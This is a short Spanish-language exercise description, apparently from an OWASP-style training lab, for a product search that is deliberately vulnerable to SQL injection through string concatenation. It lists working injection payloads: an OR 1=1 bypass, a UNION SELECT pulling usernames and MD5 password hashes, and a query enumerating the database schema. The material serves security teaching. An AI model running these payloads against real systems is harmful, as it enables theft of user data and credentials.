Buscador de productos vulnerable a inyección SQL por concatenación directa del input del usuario.
El buscador construye la consulta SQL concatenando directamente tu input. Intenta:
' OR 1=1 -- — Ver todos los productos' UNION SELECT 1,username,md5_password,3 FROM users_crypto -- — Extraer datos de otra tabla' UNION SELECT 1,table_name,column_name,4 FROM information_schema.columns WHERE table_schema='owasp_labs' -- — Enumerar la base de datosSi lográs ver datos que no son productos, confirmaste la vulnerabilidad de SQL Injection.